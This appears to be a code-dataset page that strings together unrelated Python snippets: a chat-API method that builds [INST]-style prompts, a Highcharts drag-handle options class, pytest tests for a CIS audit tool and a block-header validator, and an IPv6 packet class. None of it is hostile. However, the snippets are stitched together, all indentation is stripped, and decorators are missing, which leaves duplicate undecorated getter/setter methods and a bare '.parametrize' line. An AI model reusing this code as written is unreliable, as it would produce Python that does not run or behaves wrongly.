def text__chat(self, text: str, chatbot_global_action: Optional[str], previous_history: Optional[List[Dict[(str, str)]]], temperature: float, max_tokens: int, model: str, stream: bool=False) -> ResponseType[Union[(ChatDataClass, StreamChat)]]:
url = f'{self.base_url}/predictions'
model_id = get_model_id[model]
prompt = ''
if previous_history:
for msg in previous_history:
if (msg['role'] == 'user'):
prompt += (('\n[INST]' + msg['message']) + '[/INST]\n')
else:
prompt += (('\n' + msg['message']) + '\n')
prompt += (('\n[INST]' + text) + '[/INST]\n')
payload = {'input': {'prompt': prompt, 'max_new_tokens': max_tokens, 'temperature': temperature, 'min_new_tokens': (- 1)}, 'version': model_id}
if chatbot_global_action:
payload['input']['system_prompt'] = chatbot_global_action
response = self.__get_response(url, payload, stream=stream)
if (stream is False):
generated_text = ''.join(response.get('output', ['']))
message = [ChatMessageDataClass(role='user', message=text), ChatMessageDataClass(role='assistant', message=generated_text)]
standardized_response = ChatDataClass(generated_text=generated_text, message=message)
return ResponseType[ChatDataClass](original_response=response, standardized_response=standardized_response)
else:
return ResponseType[StreamChat](original_response=None, standardized_response=StreamChat(stream=response)) |
class OptionSeriesTimelineDragdropDraghandle(Options):
def className(self):
return self._config_get('highcharts-drag-handle')
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get('#fff')
def color(self, text: str):
self._config(text, js_type=False)
def lineColor(self):
return self._config_get('rgba(0, 0, 0, 0.6)')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(1)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def zIndex(self):
return self._config_get(901)
def zIndex(self, num: float):
self._config(num, js_type=False) |
def test_integration_parse_arg_outformat_csv(caplog):
args = [path.relpath(__file__), '--debug', '--outformat', 'csv']
cis_audit.parse_arguments(argv=args)
status = False
for record in caplog.records:
if (record.msg == 'Going to use "csv" outputter'):
status = True
break
assert status |
.parametrize('params,sequence', ((FORWARD_0_to_5, (0, 1, 2, 3, 4, 5, 6)), (FORWARD_0_to_5, (0, 1, 3, 5, 6)), (FORWARD_0_to_5_SKIP_1, (0, 2, 4, 6)), (FORWARD_0_to_5_SKIP_1, (0, 2, 3, 4)), (FORWARD_0_to_5_SKIP_1, (0, 2, 3))))
def test_header_request_sequence_matching_unexpected(params, sequence):
validator = BlockHeadersValidator(*params)
with pytest.raises(ValidationError, match='unexpected headers'):
validator._validate_sequence(sequence) |
class ipv6(packet_base.PacketBase):
_PACK_STR = '!IHBB16s16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
_IPV6_EXT_HEADER_TYPE = {}
_TYPE = {'ascii': ['src', 'dst']}
def register_header_type(type_):
def _register_header_type(cls):
ipv6._IPV6_EXT_HEADER_TYPE[type_] = cls
return cls
return _register_header_type
def __init__(self, version=6, traffic_class=0, flow_label=0, payload_length=0, nxt=inet.IPPROTO_TCP, hop_limit=255, src='10::10', dst='20::20', ext_hdrs=None):
super(ipv6, self).__init__()
self.version = version
self.traffic_class = traffic_class
self.flow_label = flow_label
self.payload_length = payload_length
self.nxt = nxt
self.hop_limit = hop_limit
self.src = src
self.dst = dst
ext_hdrs = (ext_hdrs or [])
assert isinstance(ext_hdrs, list)
for ext_hdr in ext_hdrs:
assert isinstance(ext_hdr, header)
self.ext_hdrs = ext_hdrs
def parser(cls, buf):
(v_tc_flow, payload_length, nxt, hlim, src, dst) = struct.unpack_from(cls._PACK_STR, buf)
version = (v_tc_flow >> 28)
traffic_class = ((v_tc_flow >> 20) & 255)
flow_label = (v_tc_flow & 1048575)
hop_limit = hlim
offset = cls._MIN_LEN
last = nxt
ext_hdrs = []
while True:
cls_ = cls._IPV6_EXT_HEADER_TYPE.get(last)
if (not cls_):
break
hdr = cls_.parser(buf[offset:])
ext_hdrs.append(hdr)
offset += len(hdr)
last = hdr.nxt
msg = cls(version, traffic_class, flow_label, payload_length, nxt, hop_limit, addrconv.ipv6.bin_to_text(src), addrconv.ipv6.bin_to_text(dst), ext_hdrs)
return (msg, ipv6.get_packet_type(last), buf[offset:(offset + payload_length)])
def serialize(self, payload, prev):
hdr = bytearray(40)
v_tc_flow = (((self.version << 28) | (self.traffic_class << 20)) | self.flow_label)
struct.pack_into(ipv6._PACK_STR, hdr, 0, v_tc_flow, self.payload_length, self.nxt, self.hop_limit, addrconv.ipv6.text_to_bin(self.src), addrconv.ipv6.text_to_bin(self.dst))
if self.ext_hdrs:
for ext_hdr in self.ext_hdrs:
hdr.extend(ext_hdr.serialize())
if (0 == self.payload_length):
payload_length = len(payload)
for ext_hdr in self.ext_hdrs:
payload_length += len(ext_hdr)
self.payload_length = payload_length
struct.pack_into('!H', hdr, 4, self.payload_length)
return hdr
def __len__(self):
ext_hdrs_len = 0
for ext_hdr in self.ext_hdrs:
ext_hdrs_len += len(ext_hdr)
return (self._MIN_LEN + ext_hdrs_len) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.